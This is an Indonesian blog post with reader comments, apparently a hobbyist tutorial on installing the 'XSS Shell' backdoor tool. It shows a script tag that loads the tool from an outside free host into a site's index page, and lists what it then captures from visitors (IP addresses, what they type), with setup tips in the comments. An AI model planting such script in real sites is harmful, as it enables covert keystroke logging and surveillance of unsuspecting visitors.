Haloooo..akhirnya setelah pindah server dan disibukkan ma ujian bisa ketemu lagi ma linx 😀
Langsung aja kali yaa, soalnya aQ mau ujian ni ntar sore..Sebelum ujian, tiba-tiba ada niat posting,jadi ya langsung aja konek internet N posting deh..hehehe.. Langsung ke topik ya, kali ini yang akan kita bahas adalah XSS shell / XSS backdoor.. aQ gak akan ngebahas apa itu XSS coz banyak dokumentasinya di internet..Tulis aja XSS di Google pasti banyak deh artikel yang ngebahas apa itu XSS..
Kemaren juga tau apa itu XSS shell karena dikasih tau badkiddies pas chat, katanya mau ada seminar hacking yang ngebahas tentang itu..Biz itu langsung deh searching, trus nyoba-nyoba yang ternyata ni tools lumayan keren..hehe
Oke deh,langsung aja ya,XSS shell di sini adalah sebuah tools yang berguna untuk ngelog / ngambil log sebuah situs di mana situs itu dah kita pasang script penghubung antara situs dengan halaman admin XSS shell itu sendiri. Mungkin bingung ya ngebaca kata2Q?hehe..Jadi gini aja deh, kasarannya kita buat dulu sebuah hostingan yang isinya itu adalah XSS shell nya, oia, karena ini pake pemrograman ASP jadinya harus cari hostingan yang support ma ASP ya.. Kalo aQ sih pake free hosting, yaitu jabry. Jangan lupa ya baca readmenya dulu untuk installasi XSS shellnya..
Setelah kita set semuanya, kita cari deh “korbannya”..hehehe..ya karena ini cuma sebatas tutor N posting semata, jadi aQ pake webQ yang di ugm buat korban..hehehe (masih newbie, jadi gak bisa nyari2 korban XSS :D)..Pertama aQ tambahkan dulu satu script buat ngeload script xssshellnya di index.html webQ..
<script src=”http://user7.jabry.com/[*censored]/xssshell/xssshell.asp”>
nah,setelah itu kita save.. Brarti tiap ada yang ngebuka http://linggar.web.ugm.ac.id, semua yang dilakuin orang yang ngebuka tu situs, aQ bakal bisa :
- tau IP tu orang
- dia ngetik apa aja di tu situs
- ngasih alert / pesan ke orang yang buka tu situs
- dll (baca sendiri deh manualnya :p)
Untuk contoh aja ya, misal aQ ngetik sesuatu di form yang ada di webQ tadi
trus di halaman admin XSS shellQ bakal keliatan apa yang aQ ketik
nah untuk implementasi laennya dari XSS shell adalah dengan XSS shell ini, kita bisa memberikan sebuah alert atau pesan pada orang yang ngebuka situs korban
Lalu akan terlihat
keren kan?hi3x..Oke deh, untuk yang laen, harap dicoba-coba ndiri ya..coz kalo aQ kasih tau semua, ya bakal gak cukup 1 postingan kali ya..hohoho
Ya mungkin itu dulu aja ya, kalo ada yang mau nyoba ni XSS shell, bisa langsung didownload di sini..Jangan lupa lho R-T-F-M (Read the fucking manual)..hehe
Thx for before N after..Ciaaaaoooo 😉
*NB : Bagi yang mau ngunjungin situsQ yang http://linggar.web.ugm.ac.id, gak usah takut, scriptnya dah aQ ilangin koq,jadi aman-aman aja kalo mau liat2 tu situs 😀
6 Comments
wah, jangan2 blog e iki yo dikei script xss shell, brarti ati2 dunk nek ak ngetik2 ng kene..hehe
Hahaha..Ora bro..Kalo ada script xss shell e bkal keliatan koq,soalna request xss shell tu krjanya looping,bkal ngerequest truz biar update jg xss shellnya
belajar banyak
bro.. mo nanya, di read manual itu maksudnya “Configure “database path” from “xssshell/db.asp” itu yang shell.mdb kan? dikonfigurasi sama urlnya gitu ya? kok aku ga bisa yo.. trus xssshell.asp ku kok ga bisa dibuka ya? tulisanya 404 file not found? hoho.. maaf klo tanya banyak 😀
@aditz
untuk database pathnya, dicek lagi di mana kita menyimpan dbnya..contohnya misal aQ nyimpennya di “\linx\db\shell.mdb”..
untuk masalah gak bisa dibuka, mungkin lebih dicek lagi connectornya dan commands_url nya apakah udah pas..
contoh : var CONNECTOR = SERVER + “connector.asp”;
karena variable SERVER juga sudah kita set di folder xssshell, jadi kita cuma perlu ngeset SERVER + file.asp
mungkin kalo masih belom bisa langsung PM saja,kita sharing bareng 😀
hehe.. okok bro.. udah tak add ymnya sampeyan 😀
c u @ym :p